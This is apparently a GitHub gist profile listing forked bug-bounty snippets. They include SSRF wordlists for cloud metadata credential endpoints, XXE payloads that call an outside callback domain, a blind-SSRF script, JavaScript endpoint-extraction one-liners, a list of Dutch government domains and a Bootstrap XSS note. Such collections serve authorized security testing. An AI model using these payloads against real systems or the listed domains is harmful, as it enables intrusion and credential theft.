Skip to content

Instantly share code, notes, and snippets.

View tamjid0x01's full-sized avatar
:shipit:
Web3 <3

Tamjid tamjid0x01

:shipit:
Web3 <3
151 followers · 215 following
View GitHub Profile
@tamjid0x01
tamjid0x01 / BurpTurboIntruderBasicFileWriteMultiParam.py
Created May 10, 2021 04:26 — forked from rosehgal/BurpTurboIntruderBasicFileWriteMultiParam.py
Burp Suite Turbo Intruder Example
################### This section will mostly remain as it is ###################
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=False
)
################### ---------------------------------------- ###################
@tamjid0x01
tamjid0x01 / cloud_metadata.txt
Created May 5, 2021 05:28 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@tamjid0x01
tamjid0x01 / Dutch-Government-Domains
Created April 6, 2021 05:58 — forked from Zawadidone/Dutch-Government-Domains
The Dutch Government web register (https://www.ncsc.nl/english/security, https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid)
knmi.nl
rijksoverheid.nl
overheid.nl
duo.nl
politie.nl
koninklijkhuis.nl
defensie.nl
kadaster.nl
werkenbijdefensie.nl
cbs.nl
@tamjid0x01
tamjid0x01 / WAffind
Created March 13, 2021 18:02
waffind()
{
for ip in $(cat $1) # iterate through each line in file
do
org=$(curl -s https://ipinfo.io/$ip | jq -r '.org' ) # Get Org from IPInfo
title=$(timeout 2 curl -s -k -H "Host: $2" https://$ip/ | pup 'title text{}') # Get title
echo "IP: $ip Title: $title Org: $org" # Print results
done
}
@tamjid0x01
tamjid0x01 / Github bash generated search links (from hunter.sh)
Created December 20, 2020 19:27 — forked from jhaddix/Github bash generated search links (from hunter.sh)
Github bash generated search links (from hunter.sh)
@tamjid0x01
tamjid0x01 / xxe-payloads.txt
Created September 15, 2020 10:03 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@tamjid0x01
tamjid0x01 / gist:65cc3b933934db9467b82512b1cda542
Last active June 3, 2020 12:14
{
"body": {
"key": {
"eldest_kid": "0120a7b114a9a6efdd526eb5ba03083e127143b624f475315d658d3049b037a4e7f10a",
"host": "keybase.io",
"kid": "0120a7b114a9a6efdd526eb5ba03083e127143b624f475315d658d3049b037a4e7f10a",
"uid": "cf39d02f417356fcc9eab14255a33c19",
"username": "aits"
},
"merkle_root": {
@tamjid0x01
tamjid0x01 / ejs.sh
Created May 16, 2020 09:19 — forked from gwen001/ejs.sh
onliner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# using linkfinder
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}
# with file download (the new best one):
# but there is a bug if you don't provide a root url
@tamjid0x01
tamjid0x01 / ssrf.sh
Created May 13, 2020 05:12 — forked from hussein98d/ssrf.sh
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callbak"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
echo >&2 "ERROR: Domain not set"
exit 2
fi
if [ -z "$2" ]; then
echo >&2 "ERROR: Sever link not set"
exit 2
@tamjid0x01
tamjid0x01 / Bootstrap_XSS.md
Created May 8, 2020 04:51 — forked from BlackFan/Bootstrap_XSS.md
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();